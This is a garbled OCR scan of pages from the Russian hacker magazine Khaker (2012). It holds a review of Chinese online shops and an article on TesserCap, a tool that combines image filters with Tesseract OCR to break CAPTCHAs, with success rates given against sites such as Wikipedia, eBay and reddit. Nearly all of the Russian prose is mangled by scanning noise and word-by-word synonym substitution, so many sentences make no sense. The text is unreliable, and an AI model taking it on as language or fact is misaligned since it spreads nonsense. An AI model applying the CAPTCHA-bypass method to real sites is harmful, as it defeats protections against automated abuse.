www.mancard.ru

(game}land


PCZONE

Ромаха Володин (biohedge!Ogmail.coml

Кита СЕМЬ КИТАЙСКИХ ИНТЕРНЕТ­ МАГАЗИНОВ СО ВСЯКОЙ ВСЯЧИНОЙ Где максимально недорого не грех укупить планшетник получай Aпdгoid?

Или осциллограф? Или, ко примеру, лазер? А запчасти интересах разбитого смартфона? Да с годами же, идеже равно десятки тысяч других самых разных

товаров, которые во огромных количества х штампуются на Поднебесной, -в китайских интернет-магазинах. И, почто важно, в области самым доступным ценам .

MADE IN CHINA Три знакомых языкоблудие

в отношении нескольких с них- тех, из которыми имел

<<Made in China >>

давным-давно

обос н авались получи и распишись об гр ом н ом количестве все­

рукоделие либо автор сам, либо мои др узь я. Сразу хочу предупредить, что-нибудь запас магазина- задача

возможных товаров, во особенности в технике.

субъективный. Перед какой угодно покупкой обяза­

Гл у сообразно было бы рассчитывать , что такое? вблизи вместе с про­

тельно вероятно отзывы равным образом имей на виду- целое гда

изводством отнюдь не появятся огромные интернет­

принимать далеко не которая вероятность, в чем дело? передача

магазины, идеже всё сие д обро позволяется сметь вместе с прилавка

потеряется , почто третьяк окажется бракованным,

по части максимально ни зкой ц ене. Д умаю, многие

что-то на коробку положат вещь малограмотный так либо — либо соберут

слышали что до как никогда раскрученном магазине

группа далеко не полностью- такое приходится

-

DeaiE xtгeme.com, - даже если неравно е щ е нуль

везде, сверх исключений. Н в рассуждении вслед те цены, которые

во н ем безвыгодный заказывали. Н касательно подобных магазинов

предлагают подобны е ма г ази ны , многие г ота·

д овольно много. Сегодня пишущий эти строки хочу растрезвонить

ваша милость от сим мириться. П риступ им?

ХАКЕР

03/158/ 0012

'


В небесная империя следовать пок у пками ?

FocaiPrice.com Категории товаров: eJ~EJ~

0Ь06p3'n>I0Тef'CipMtO

Способы оплаты:

R ICQQJнн•

R:>ealprice ·~.;о •

;\'\ HOOIIHI(H

Бестсе/VIеры

,., Сnецнаnьные nредnоження

Dropshlpplng

Оrзыsы

PayPar€'

Форуны

&с8АН•-•• СкмАQ

[не к всех товаров]

Q :zo М 02. S

.............

с 04 предварительно 05 дней

Срок доставки:

В14део

r Q>On!IID!lh

Дmi~'IG~Ait Иrруwкм Хо6бм ЧiКIII

Водан изо лидеров китайской электронной

АатомОбмnW~wе <11(Q!(CyitPW

коммерции предлагает больше 00 000 наимено­

013 CIUI8A-Й КQ,ц-1'1

Ст1:рео Н.'(IUHMK

Чi!:ltOJiдii•I PidiCI:IoopH I!:

Мotorola59B~

~ US$7.49

~ USSl

ваний товаров во примерно 000 категориях [гадже­ ты , аксессуары ко ним да приближенно далее] . По край­ н ей мере, где-то возлюбленный самопроизвольно заявляет. Проверить эти данные сложно, а то, сколько тогда дозволительно выкопать

~

самого черта,- сие точно. В ассортименте

./

восстановление стонмоаи

магазина имеются копии именитых б рендав

./

t,есплатый ремоlfТ о rечеине 08Dдней

[ох полоз сии китайцы], телефоны равно оргтехника

на теценне

00 дней

Мобильные телефонw

• Те~~еФо-

.u~ Androtd • TUie:ФO- С tl!:tCC\PНWOI • Qwerty тt,!J~eФOttw

тотально приемлемого качества [судя равным образом по мнению лич­ ному опыту, равным образом сообразно отзывам] .

Комn1>10теры равно конме

Фотоаnnв ратw

"

• Ч~wмll.ei\cw

• 0'\nанwе'"..м:

• МР3

~

• КА&еllммде.Р*о'те/IМ

• ltJwo8м.rypw

• Aa'nмtollмn ... welк(I!C(y

• 0Ca6e/ltt ., npeo6pa:JO•aтe

Аксессуары

Apple

• Сец:-

• Аксео:уl""'~~

Первое, который привлекло меня быть знаком­

nк м нoYJfi

.. ttWWIUII

НР-4 м

MPS

емео

• Нio'(IUHIUtM

• Alc.cy"YII•ro~ ко :IAPI'Att

o6opyAOfla-

~Оnоеещения

~ в,-...-..-·- -

ст ве вместе с магазином, - сие цены. У некоторых

товаров они были ниже, нежели держи еВау [да-да, китайцы продают вагон своего товара

таковой раздел может служи ть <<nесочницей>>,

равным образом сверху западном аукционе, так я текущий секунда

идеже дозволено сметь из прилавка прикольную мелочевку

Впрочем, доставка, как бы равным образом везде, может затя­

трактовать безграмотный будем]. Как оказалось поз­

равно надоедать для сервису, никак не тратя значи­

нуться. Обычно посыл подле хо дит отнюдь не вначале ,

же, случай уступать по мнению ценам вверх

мых сумм.

нежели путем двум недели. Если твоя милость сделаешь за­

Каждый предмет торговли имеет описание, рейтинги

рыночных обусловлена территориальной бли­

в качестве кого у почти не всех магазинов такого плана.

каз с гаком $20, так <<Фокал>> ласково привяжет

зостью магазина ко заводам -изгот овителям.

равно отзывы, которые помогут совершить извлечение .

для твоей посылке трек-номер чтобы отслежива­

Более тог о, «Фока л >> при всех предлагает

Для оплаты позволяется истощить PayPal.

ния статуса работа .

отстать получи и распишись форуме магазина доклад

С недавних пор FocaiPrice стал пить

что до том, что-то твоя милость сделал какой-либо изо това-

равным образом

WebMoney, да непостоянно малограмотный к всех товаров .

В целом резерв оставляет приятное впе­ чатление , но, клеймящий в области отзывам, равно некто безвыгодный лишен

ровенник дешевле,- во таком случае плата хорэ

Магазин зачастую проводит непохожие акции,

на сех тело дартны х проблем <<ки тайски х>>

пересмотрена. Посетителям и доступен

а в целях некоторых предложений лакомиться ски­

магазинов: задержки, недокомплект, несоот­

раздел со спецпредложениями, которые

дочные купоны, коды которых позволено выискать

ветствие характеристикам.

отсортированы в соответствии с ценам, начиная ото одного

на интернете.

доллара. Для сомневаю щихся тож новичков

Что касается доставки, в таком случае возлюбленная бесплатная,

КАТЕГОРИИ ТОВАРОВ

ШЕСТЬ СОВЕТОВ ДЛЯ НАЧИНАЮЩИХ 1.

Купоны- сие отличная вероятность сохранить капелька денежек . Причем произвести шифр купона

вовсе малограмотный сложно: их раздают для сайтах кажется гeta il menot . com [крупнейший, так англоя зы чный ресурс] , chinaprices.гu , а в свой черед во темат ических сообществах . В конце концов, позволено банально вбить на разведчик <<куnон получи скидку <ИМЯ магазина»> .

0. Чтобы бурно обнаружить занимающий тебя мал да сверить цены, не грех nоnробовать сначала восnользоваться специализирован ными nоисковиками. Например seaгchsku.гu ищет по двадцати разным магазинам. Такой а стервис лакомиться равным образом получи и распишись сайте ch i napгices.гu .

0.

Перед покупкой далеко не поленись полазать до форумам, nочитать информацию об книжка тож ином магазине- сие может сильно nомочь . Изучай nлощадки. Изучай, изучай равным образом покамест раз в год по обещанию изучай.

Dl

Мелкая электроника

r::]

Товарыб;ля

fl

Сувениры

01

Бижутерия

а

Товары с целью

I!J

Товары ради

автомо

иля

здоровья

детеи

~

u ~

0 D м

Товары для дом а

Игрушки Часы Спортивные товары

Одежда Музыкальные инструменты

Сообществ шоnоголиков не откладывая навалом - для примеру, форумы ebay-foгum.гu да mySku.гu .

0.

Если одновременно произошла какая-то ложный шаг [допустим, nри что касается тправке , доставке] alias питаться вопросы по ассортименту- отнюдь не стесняйся черкать на поддержк у. В делавар е некот орых магазинов хоть есть русскоговарящие сотруд ники.

0.

При оплате заказа нужно исnользовать всего-навсего nроверенную платежную систему. В периалгия шин стве случаев сие

PayPal . Некоторые китайские магазины поддерживают WebMoney равно аж Qiwi, но, PayPal- они оче нь сподручно умеют принимать решение проблемы

тем никак не менее, моя особа рекомендую истощить

СПОСОБЫ ОПЛАТЫ

PayPal· weьmoney ~;;.

Pa yPal WebMoney

из нерадивыми продав цами.

0.

Терnение, терnение да до этого времени однажды терnение. Заказывая при помощи интернет, н ужно присутствовать готовым

Qiwi

подождать. Заказ могут медленно формировать, бесконечно отправлять, а после препятствовать бери таможне

или — или для каком-нибудь этапе работы многострадальной П очты Ро ссии.

ХАКЕР ОЗ

/158/ 0012

Кредитные игра в карты

039


PCZONE

Dealextreme.com Категории товаров: Hom8

$2 Gadgeta

РауРаГ

Срок доставки:

ОТ

01

Тор Sellll"'

Ordar Tracklng

*

Foruma

~ews

SDC..'(I,>INd;I"'IO>e~~Digl:.lloU~m«..,LCOOI;;.!Iy~,I......._C!> а -

• .....• ._"" "EISV 00 Say, fosy ta S1 ~~· • STAAS ol OIC VJdeo Cont~5t "-"с o;ome outl

с---~

Способы оnлаты:

Oeals ~

New Arr1vat s :\\

-

IJ t. a_

-

ДО

_.

00 Д НеЙ

._

Сложнонеупомянутьодинизсамыхизвес~

--·-

ны х китайских магазинов- DeaiE x tгeme . com . Свой центральный исследование покупки во китайских

~.,

интернет-магазинах мы павел учил как здесь.

......

-·-·--

Чего ваш покорнейший слуга лишь только безграмотный заказывал: равным образом защитные

пленки, равно батарейки, равным образом фонарики, да диcплeй для телефона, равно всевозможные аксессуары. Рас­

-

Adulr.Toyi(Нot]

сказывать тогда особенно равно нечего: оный резерв

сделано опробовали тысячи людей. Основное на­ правление магазина- гаджеты, представлен­

C.rtiolder S~e J НOunl

USB Ooclr.lng Statlon

E271 .SW65001<158·

Chllrgerwolt\US8

LumenЗO·I..!OWMe

for iPI>one4/ 05 - !lll(lr.

Dat.a / ~rgl ngcaЫeror

l..iohl Bulb

( АС

CII~CitiveScree n TouchlngК.ndWormer

Gloves • BI.adc(PII<-)

ные во астрономических количествах равным образом до жуть

привлекательным ценам. Е сть двухдолларо­ вая пространство к мелочевки, разделы новинок

Отследить уход дозволено согласно тр ек-номеру,

равным образом вместе с пецпредложений . Аналогично TiпyDeal ,

кто предоставляется безмездно пр равным образом за­

выгода предлагает набивать карман да скапливать

казе сверху

бонусные баллы, п убликуя описания сиречь видео

равным образом отзывы получи и распишись форумах, позволяется резюмировать:

не запрещается быстрее, в таком случае отличается как небо с земли употребить

для товарам. Выполнить оплату заборщик может

D ealextгeme- заслуживающий магазин, у которого

другим ресурсом, особенно сие касается людей,

сквозь

только одиночный недостат ок: серьезная медлитель­

которые занимаются дропшиппингом [посред­

ность [посылку допускается терпеть свыше месяца!,

ничеством!.

Pa yPa l

тож со п омо щью кредитной карточная игра ,

близ этом вслед за доставку сам черт сносно далеко не возьмет.

$15. Учиты вая

личный проба

что-нибудь связано вместе с громадным численностью заказов .

Итог: безраздельно изо самых раскрученных мага­ зинов. Но неравно тебе нужно надергать третьяк наравне

"

Tinydeal.com ';..[

насчёт

0 Toup (08)

Категории товаров:

t:::::::"'

..._,."_.

Способы оплаты:

IPhoм, 0 ~ м

РауРаГ

....._..

-

-.д_,.

Срок доставки:

ОТ

0 ДО 05

днеЙ

lhd

..

~~:-- . Кр-.

.. , , . . _

Дрн м Dфме

В ассортименте онлайн-магазина пред­ ставлены электроника, уникальные гаджеты и обилие самых разных товаров , вдобавок

Иrp'f\IU!IIIIxa66tl . . _ .. дi)uOЦIItlltOCПO

Лидеры продаж )

Cnopflla'I'AWX

~tl:li'lqi-U

~

зa,.,s--c.u..aw

отдельный месячишко появляется до некоторой степени тысяч новинок . Для каждой позиции представлены

подробное описание, рейтинги да отзывы, а от времени до времени видео равным образом русскоязычные коммен­

тарии. Порадовал в свою очередь онлайн-чат, идеже я смог аллегро нахватать ответы для интере­ сующие меня вопросы, вдобавок держи русском

языке. На сайте принимать раздел спецпредло ­

дарков. Помим касательно

жений со еженедельными скидками, а опять же

ются кредитные картеж равно WеЬМопеу. Впро­

ко товаров, так для того получения чёрт платн ого

пятидолларовая пояс чтобы мелких товаров.

чем, пишущий эти строки до сей времени в одинаковой мере упрямо рекомендую

треки н г-номера достоинство хо тя бы одного изо них

Цены паче нежели приемлемые , вспомогательно

вести всегда торговые связи при помощи

винтернетеможно выискать купоны для скидки

больше надежно, кризис миновал опротестовать транзакцию .

должна существовать раньше $20. В противном случае за треки н г придется приплатить $2-3. Перв ой

[5-7 %1. Плюс ко всему прочему очищать воз­

К тому но возьми оплату картами без дальних разговоров д ейству­

моей покупкой на этом магазине был телефон,

можность согласно купать вещи вслед баллы [так

ет предел во $150.

равным образом всё все прошло наравне запрещается лучше.

называемые ТО Poiпtsl , которые начисляются

Pa yPal,

ко оплате принима­

PayPal-

зто

Доставка во любую точку таблица бесплатна.

единодержавно нюанс: коли во тво ем заказе несколь-

Вывод: об тличны й зоомагазин со широким ас­

ради публикацию комментариев равно обзоров .

Посылка идет, в духе да везде,две-три недели [бы­

сортиментом, адекватные стервис да поддерж­

Приятный бонус- присутствие заказе получи и распишись сумму

вает, почто доходит да из-за неделю, а сие доводится

ка - например, буде рядом получении неизвестно почему

сверху

редко!. Трек-номер чтобы отслеживания посылки

неграмотный хватает, ведь затем обращения заурядно безо

выдается рядом заказе сверху

проблем высылают недостающее .

$200

тебе предложат поднять единственный

с нескольких возможныхнебольших немного

01,0

$35, однако здесь питаться

ХАКЕР

03/158/2012


В небесная империя после покупками?

Pandawill.com Категории товаров:

МоА uкаукт

mD м

Ht llo , Sign ln Or 0'8g1stor

n

Поисхаn. мсь мага1мн 0Д8СЬ

Способы оплаты :

РауРаГ -

Срок доставкiА:

ото 05 давно 05 дней

AxceccyapAppie

С0Т08Ы1611Теnефон

Пn11W8T

Дolol

Мода

Од8*д8Д8Т8Й

(i

П оиск

~~·...----.....,....,..,.~

ХО1,1ПЫОТ8р

-~

fJflЬi;(ё~

Ht'lp

[] RSS

~~~'

~

НС18НН1М

-

Ruulan 0 USD

&'М

live

0611 коо,..а(О)

-

0р3НАW

-~

BceiCaТ8ropt81'"'

All Free Shipping! -

Еще единолично чайный интернет-магазин, ко­

~* ' -

ПРАЗрНИЧНЫЕ КОДЫ КУПОНОВ:

<:" P~NDAWILLB0-5 ,

PANDAWILL150-10, PANDAWILL200-15,

PANDAWILLЗ00 -30,

Подробнюи

'\.

' "~·

PANDAWILL400-50, PANDAWILL500 ;~5 -

торый недостаточно ч ем выделяется сре ди конкурен ­

Прямь1е nоставки/Опт Дflillj)a)МOЩotiiUI»-IIInpRIIIYIO

тов. Н о, сверху муж взгляд, лабаз максимально

IIOCTHI()IIo\IJolont,~\QfфoptoiOЦiolll,

фотоrрефt~А

roupoe 003 noro Pandow'l.

м:r.с 'Фi'·!J!:W

адаптирован для того русскоговарящих покупате­

лей. Судя в соответствии с отзывам, се г одня симпатия нераздельно с лиде­

В се по отношению

последних

углубление сообразно числу продаж во страны СНГ. Н а форуме

новинках nодпис•mься сеичвс?

сайта доступен динамичный русскоязычный раздел, а посланник магазина зачастую

Вынrраrь

встречается от потенциальн ыми п оку пателями

Бесплатные ЛOAiJPKII

Тол•ко

получи и распишись тематических ру сских форумах- короче говоря, саппорттут отмен ный. Из заметных преимуществ магазина- рекордный ассор ­

Популярные вещи

тимент телефонов (в книга числе равным образом со следовать косом

Мода

Новинки

An•

Лю6мтепейl

# Распродажа

Отправьте

Пnаншаты

нам фотографию

по-под популярные марки ! . Водан моего знакомый при обрел во Pa ndawill священнослужитель уляр н у ю китайскую

ПniMU/e'fP!oo!Й IIONI!bwn.p

вawero малыwа

Alno1Novo7Aurora

н nолучите nодаро~е

Arldtokl4.0 HrfACHIIPS Э кр111 0GB 0GB RАМ

мо д ел ь телефона равным образом остался доволен во вкусе самой

Topon~necьl Коnичес:тео

US$115.99

покупкой, т а для равным образом быстрой д оста на кой, кото раиса

заняла лишь десятеро дн ей. Советую безвыгодный забыть про раздел распродаж- после этого -де йствительно

дозволено отыскать адски дешевые т овары . Оnлата через PayPal равным образом ли картами Visa равно Master Сагd,

предоставления бесnлатного трек-номера: его

притом не грех настил учит ь заметную ски дк у

дозволено нажить лишь только nри заказе в сумму

ряды к русскоязычного пользователя,

по мнению купону. До оклад буд е т бесплатной. Един­

не без; выш е $50 (тут согласно сравнению не без; конкуре нтам равным образом

и так равно безвыгодный вместе с самыми ни зкими ценами возьми попу ­

стве нное, что-нибудь ми невыгодный понравилось,- побег л овие

« Панда >> безоговорочно проигрываетl.

лярные товары.

Общее впечатлени е: будь здоров мудреный

ТРИ ДОПОЛНИТЕЛЬНЫХ МАГАЗИНА NOWSUPPLIER.COM Категории товаров:

m

Способы оплаты: Срок доставки:

MERIMOBILES.COM

BUYINCOINS.COM

Категории товаров:

m~

PayPar -

Способы оплаты:

PayPal

ото

Срок доставки:

через

~Е] fj

0

0 вплоть до 05 дней

Категориитоваров: m~во -

04 впредь до 05 дней

Способы оплаты:

PayPal· -

Срок доставки:

с

0 прежде 05

дней

Многие человеки успешно nриобретали на этом

Интернет-магазин с предприимчивы х

Порадовала смертельно быстрая lи, кстати,

магазине планшеты равно остальные гаджеты ,

американцев. Посылки приходят с Китая ,

бесnлатная) подача , особенноучитывая

же у меня был горестный опыт: заказав

хоть бы на поддержке работают одни << штатовцы >>.

nредновогодние дни. По широте ассортимента

да оплатив телефон, мы получил фасон со

Заказывал у ни х по мнению мелочи- наперник , ЗG-модем

сайт далеко не уступает конкурентам. Из нареканий

урезанным функцианалом (на $30 дешевле)

равным образом стилусы . Как у всякого уважающего себя

-только периодические лаги сайта. Если

равно безграмотный того цвета . Печален аж отнюдь не самопроизвольно эпизод

китайского магазина, выплата вследствие PayPal да бесплатная разнос nрисутствуют,

бы не. зто, так стек занял бы достойное

отnравки отнюдь не праздник модели, а то, что-то весь попытки как-то вынести решение проблему безграмотный увенчались

так nосылки отправляют обычной почтой равно вне

равным образом TinyDeal .

успехом. Возможно , от

трекинга .

PayPal

было бы

поляна неподалёку не без; моими фаворитами FocaiPгice

уймись растворить диспут, однако никак не факт.

ЗАКЛЮЧЕНИЕ

позволительно сохранить . Если мал вне отзывов­

обращайся на службу поддержки. Н е забывай :

В заключен да е хочетс автор этих строк перед ба крутить , что-нибудь в рассуждении дин да оный

непременно уточняй комплек тацию равно харак­

китайские интернет-магазины только пользу кого тех,

но опт может составлять кайфовый многих магазинах,

теристики : то и дело присылают черт знает что отличное

кто именно может выжидать . Е сли почто -то нужно на этом месте равно

только объединение разным ценам. П озтому поначалу сравни

с указанного на описании. Чтобы максимально

сейчас, ведь вернее семо пусть даже отнюдь не заглядывать. И

да всего попозже совершай заказ. Не поленись

защитить себя, оплату л у чше пров одить

дух правило: тот, кто именно ищет, век найдет.

пошакалить во Сети куnоны в скидку, из ними

при помощи PayPal. В случае проблем всенепременно

Удачных покупок' ::Х::

ХАКЕР

03/158/2012


PCZONE

Гурсев Синг х Калра 0gursev.kal ra!a foundstone .com 0

ка н ость ТЕСТИРУЕМ УНИВЕРСАЛЬНУЮ РАСПОЗНАВАЛКУ САРТСНА

Ес ть ра з ные способы в целях обхода САРТСНА, которыми защищены с а й твоя милость . Во - первых , будучи не без; твуют с п е ц равно альные сервисы,

РЕШИТЬ САРТСНА

ем. Взлом Сарtс h а-фи л ьтров» с

#1 05

равно

#126

Р акробат воздуха п озна во а н ие СА Р ТС Н А - альтернатива чаще во этого

номеров соответс т венно. Сегодня а аз многогрешный хочу

нетривиальна автор . Н а образ что поделаешь

ра сс показывать тебе что касается разработке TesseгCap, ко т что касается ­

складывать массу крат л ичных фильтров, что­

рую ав т гомон называет универсальной решалкой

бы запрятать искаже н ия да п омехи, которыми раз­

СА РТ СНА. Любопы т ная штука, во вкусе ни кру т и.

работчики желают упрочить упорство следовать щ да т ы.

ПЕРВЫЙ ВЗГЛЯД НА TESSERCAP

ко оторые равно спользуют дешевенький

Зач а стую п риходится реализо во ыват ь обучае ­

ручно й усилие да бу для вально вслед за $1

мую сис т ему сверху ос н ове нейронных сетей [зто,

Ч ведь от д елал писатель п ро г раммы? О н посмотре л ,

предлагают урегулировать

ко слову, отнюдь не этак из л ожно, вроде може т показа ть­

что естественным путем подхо д ят для п р облеме автоматизи­

ся], дабы д обиться п р иемлемого результ а т а

ро во ин н ого решения СА Р ТСНА равно в соответствии с п робовал

согласно ав т оматизиро на анному р ешению капч. Ч тоб ы

слить текущий испытание во об д ном да н струмен т е .

понять, касательно нежели аз многогрешный говорю, лу чш е п по отношению д нят ь крайне во

Автор заметил, что такое? на удаления ш умов вместе с из ­

0000

капч.

В ко ачестве альтернативы м об ж н об постараться написать и нтелле ко туальную не без; да стему,

равно прочи т ать заме ч ате л ь н ые ста т ьи <<Вз л ом

браже н ия, т об ест ь реше н ия самой слож н ой

САР Т С Н А: теорийка да прак т ика. Р азбираемся,

задачи подле распознавании капч, чаще всегда г в отношении

на правах л омают ка п чи» равно << П в рассуждении д смо т рим да рас п озна-

применяются одни равно те но фильтры. П олучает-

коташка орая по мнению опред е ленным

алгор да т м а м хорош сама выполнять отождествление .

САРТСНА

Обработанная САРТСНА

Распознанный текст

Последнее об эту пору позволяется

HMLR

р е ал изо ова т ь от по мнению м ощью

от пец равно альной утилиты .

01,2

С хема анализа САРТСНА- изображени й вместе с через

TesserCap

ХАКЕР

03/158/2012


Проверка в надёжность

вместе с я, в чем дело? если бы исполнить спокойный инструмент, позволяющий безо сложных математических

~ ~-

.....

-

преобразований наваливать фильтры бери из ­

[: 0152\4'] ~ ~~-- ·::

бражения, да сочетать его из ОСR-системой

-

- -

... _

основательно работоспособную насчет грамму. Это, с обстве нн о, равным образом ес Гурсев Сингх Калра

с компании

McAfee. Зачем

--·==

... 0

L41 ~2~

к распознавания текс т а, т по отношению дозволено произвести

з т по части было нужно?

0

01~2\А

Автор утили т ы решил таким об присест ом про­

\ 'О=

верить, до чего безопасны капчи для рупных ресурсов. Для тестирования были выбраны т е

-·1 -~ 0

~- ,------

""---""""""""'

Wiilli)

насчёт

-

.

.

0 ~- 0 4755535

[~ __j ·1 ·~3

G1

tт:U.

-

01~

l ~k l 0 ~70 ЭИН

[

интер нет- сайты, которые являют ся са мыми

005Ul76

~~or.- ::::1

ь:

.... ,..с--

J

Предварительная отшлифовка изображений равным образом равным образом з порыв

Кандидатами нате отношение во т естировании стали

текста изо капчи

Wikipedia,

еВ ау, а тоже

-~

Ufff:i

--·--·-- -

~

~

...

статистики www . quaпtcast . com/top-sites-1 .

провайдер капч гeCaptcha.

-

01 о 1 0" liJ G 1 0 ~269

посещаемыми до версии известного сервиса

такие монстры, что

~~ c:::::!LJ

. _:l/flilf[~

Результат анализа капчи xakep.ru от предварительной обработкой изображений . Судя соответственно результатам, фильтр подобрать далеко не посчастливилось

ИНТЕРФЕЙС. ВКЛАДКА MAIN П осле з ап уска программы п еред нами пред­

нужно в отношении придавать значение результаты рас в области з нав а н ия

тезис функционирования программы, т по части по части н

стает окошечко от тре мя вкладками:

изображений, насчёт тм етив всякий изо них во вкусе

будет прост. Исходная капча поступает

lmage

во систему предварительной обработки изо­

включает первоначальные сведения управления, которые

няя, сугубо значимая ипостась служит пользу кого

бражений, очищающей болона говорят с всяких шумов

исnользуются пользу кого зап у ска да остановки теста

передачи любого изображения во систему nред­

да искажений равно объединение конвейеру передающей по­

САРТСНА-изображения, формирования ста­

варительной обработки, во которой задается

лученное икона ОСR-системе, которая

ти стики т еста !сколько отга дан о, а сколечко

фильтр, удаляющий из изображения шумы да ис­

вместе с тарается рассмотреть шрифт получи и распишись нем . TesseгCa p

нетl, навиг а ци да равным образом выбора изображения с целью

каже ния. Чт обы отправить впадина т инку во сис т ему

имеет диалоговый графиче ский интерфейс

предварительной обработки. В пашня для того ввода

предварител ьн ой обработки, держи д в рассуждении снять

равно обла так точно е т следующими свойст во ами :

URL-aдpeca надо оказываться указан законченный

нате требуемом изображении nравой кноnкой

Е сли анализировать на об суп х принадлежность х

0.

0.

0.

Ma in, Options,

P гepгocessing. Основная супинатор

коррек т н ы й либо бестактный . Н у да послед­

URL-

Имеетуниверсальную систему пре двар равным образом ­

aдpec, кто веб-приложение использует

мыши равно во кон т екс т ном подбор отобрать условие

тельной обработки изображений, которую

с целью извлечения капч. URL-aдpec позволено по­

Send

допускается получи и распишись творить чтобы каждой отдельной

л вдалбливать следующим образом: кликнув правой

lmage

Рг ергосеssог.

ИНТЕРФЕЙС. ВКЛАДКА OPTIONS

капчи.

для н касательно nко й мыши

Включает во себя сис тем у распознавания

переснять другими словами пролистать адрес страницы

Вкладка в рассуждении пци й со д ержит отличаются как небо и земля злементы

Tesseгact, которая извлекаеттекст изо пред­

равно извлечь URL-aдpec изо атрибута sгс тега из ­

уnравления чтобы конфигурирова ния TesseгCap.

варительно проанализированного да под­

бражения

Здесь дозволительно прибрать ОСR-систему, после д ать

готовленного САР Т С Н А - изоб ра жения.

гu зто приветствие www.xakep.гu/common / гateit/

Поддерживаетиспользованиеразличных

captcha.asp?name=xakep . гu . Ряд ом со стро-

сацию да предварительную обработку изобра­

ко дир овок на системе распознавания .

для ой а др еса находится элеме нт, задающий

но ни й, присчитать пользовательские НТТР­

ко оличество капч, которые н ужно занять

ради головки , а в свой черед определить диапаз в отношении н символов

Думаю, всеобъемлющий квинтэссенция понятен, поэто м у

на тестирования. Та для на правах присовокупление может

к системы расnознавания: цифры, буквы

no

<img>.

САРТСНА-изображению,

То

Н апример, на случае из

xakep.

предлагаю посмотреть, наравне сие выглядит .

враз nоказывать лишь только

Универсал ьн волос утилиты н е могла невыгодный приве­

б р ажений, на нем предусмотрены азбука

сти для усложнению ее интерфейса, п оэтому ок н в рассуждении

у пр авления на постраничного п ролистывания

программы может вв ести во маленький со т у пор .

загружен ны х наплыв ч . Та ким образом, рядом мас­

02

изо­

габариты веб-прокси, влить nереадре­

на нижнем регистре, буквы на верхнем регистре , сnециальные символы.

Теперь по части каждой оnции поподробней . Пр язва д е всего, дозволено найти ОСR-систему.

Так что, хуй т ем по образу п ереходить н е п ос ред­

штабном тестировании автор сих строк сможем nроли­

П по отношению умолча нию д оступна токмо одна ­

ствен н насчёт ко ра спознаванию капч, предл агаю

ст ыв ать загруженныекапч ии пр исследовать

Te sseгact -ORC , круглым счетом что-то замора чивать ся

разобраться от ее интерфейсом да заложенным

результаты их распознавания. Кнопки Staгt

со выбором т ут безграмотный придется. Еще одна весть

функциона л ом.

да

интересная случай программы- вы­

Stop запускают

равно оста н ав лива полуют тестиро­

вание соо тветствен но. По со ле те вместе с т ирования

краснолесье диапазона символов . Возьмем, напри­ мер, капчу от xakep . гu- видно, который симпатия далеко не со­

д е ржит н да одной букв ы , а состои т т что до льк о из цифр. Так зафигом нам лишние символы, которые всего лишь увеличат объективная возможность никак не кор­

ОБАВТОРЕ

р ектного распознавания? Конечно, они нам ни для чему, оттого присутствие тестировании капчи

xake p.гu самое лучшее указать, почто симпатия содержит Мы отнюдь не могли никак не проговорить х отя бы испарения слов об

Подразделение профессиональны х услуг

в рассуждении отрезок времени цифры: Num eгics. Но почто ежели удосужиться

авторе замечательной утилиты TesseгCap .

FoundstoneФ, на котором симпатия трудится, nредлагает

Uррег

Его зовут Гурсев Синг х Калра . Он работает

организациям эксnертные сервис равно обучение,

п ознать капчу, состоящую изо заглавных букв

главным консультантом во подразделении

обесnечивает nостоянную равным образом действенную

любого языка? Н ет, невыгодный сможе т. Пр ограмма бе­

профессиональных услуг

защиту их активов ото самых серьезных угроз.

рет роспись символов, используемых ради рас­

во х одит во контингент

Команда nодразделения nрофессиональны х

познавания, изо конфигурацио нны х файлов,

услуг состоит изо признанных экспертов

находящихся во \Ргоgгаm

во области безоnасности равным образом разработчиков,

Fг ее Too l s\TesseгCa р

Foundstone, которое комnании McAfee . Гурсев

выступал получи и распишись таких конференциях, что Тоог­ Соn ,

NuiiCon

равным образом

ClubHack. Является

автором

Case?

Сможет ли пр ограмма рас­

Files\ Foundstone 1.0\tess data\co nfig s\ .

инструментов TesseгCap равным образом SSLSmaгt . Помимо

имеющих зажиточный оnыт сотрудничества

П оясню для прим ере : коли ты да я выбрали

сие го , разработал сколько-нибудь инструментов ради

со международными корnорациями

опции Numeгics равным образом L oweг

внутренних нужд комnании . Любимые языки

да государственными организациями

обратится ко файлу loweгпumeгic, начинаю­

в области воnросам безоnасности .

щ емуся не без; параметра tessedit _ chaг_whitelist.

программирования-

ХАКЕР

03/158/ 0012

Ruby, Ruby on Rails

равным образом С#.

Case,

в таком случае пр ограмма


PCZONE За ним надлежит инвентарь символов, которые

ИНТЕРФЕЙС . ВКЛАДКАIМАGЕ

будут применяться к решения капчи.

PREPROCESSING

По умолчанию на файлах содержатся всего

Н у видишь автор да добрались впредь до самой интересной

буквы латинского алфавита, круглым счетом сколько чтобы рас­

вкладки . Именно т ут настраиваются фил ьт ры

познавания кириллицы должно сменить либо

ради у д а л е н ия не без; капч различных шумов да раз­

мытий, которые стараются максимально

поднять меню символов.

Теперь маленько об том, в целях а нужно поле

Http Request

Headeгs. Например, в не­

Процесс настройки универсального фильтра предельнопрости состоит изо девяти каста п ов.

того в надежде заметить капчу. Чтобы TesseгCap

Изменения изображения отображаются получай

смогла произвести вход ко капче, программе

каждом этапе предварительной обрабо т ки.

никуда не денешься отправить на запросе НТТР такие

Кроме того, бери странице переводу нет компо-

заголовки, равно как Ассер!,

нент проверки, кой позволяет расценить

равным образом Rеfеггег

равным образом т. д . Используя веб-прокси IFiddleг, Вuгр, Chaгles, WebScaгab, Рагоs равно т. д.l, можно перехватить посылаемые заголовки запро­

са равно учредить их во луг ввода

наложенном фильтре. Рассмотрим подробно каждый этап.

H eadeгs. Еще одна опция, ко т орая навер ­

Этап

няка пригодится,- сие

На данном этапе инвертируются цвета

Rediгects.

Веб-сайт

Доля распознанных капч

Wikipedia

00-30%

ЕЬау

00-30%

reddit.com

00-30%

CNBC

>50%

foodnetwoгk.com

00-90%

dailymail.co. uk

>30%

megaupload .com

>80%

правильнесть распознавания капчи рядом

Http Request

Follow

САЙТАХ

запутать задачу системе распоз н авания.

которых веб-сайтах нужно залогиниться, к

Cookie

РЕЗУЛЬТАТ ПРОВЕРКИ САРТСНА НА ПОПУЛЯРНЫХ

0.

Инверсия цвета

Дело во том, который TesseгCap в соответствии с умолчанию

пикселей про САРТСНА-изображений. Код,

никак не долженствует переадресации. Если отладочный

изображённый ниже, демонстрирует, наравне сие

pasteЬin.com

00-80%

URL-aдpec вынужден за мною переадресации

происходит:

cavenue.com

>80%

на получения изображения, нужно выбрать эту опцию.

Ну равно осталась последняя опция, вклю­

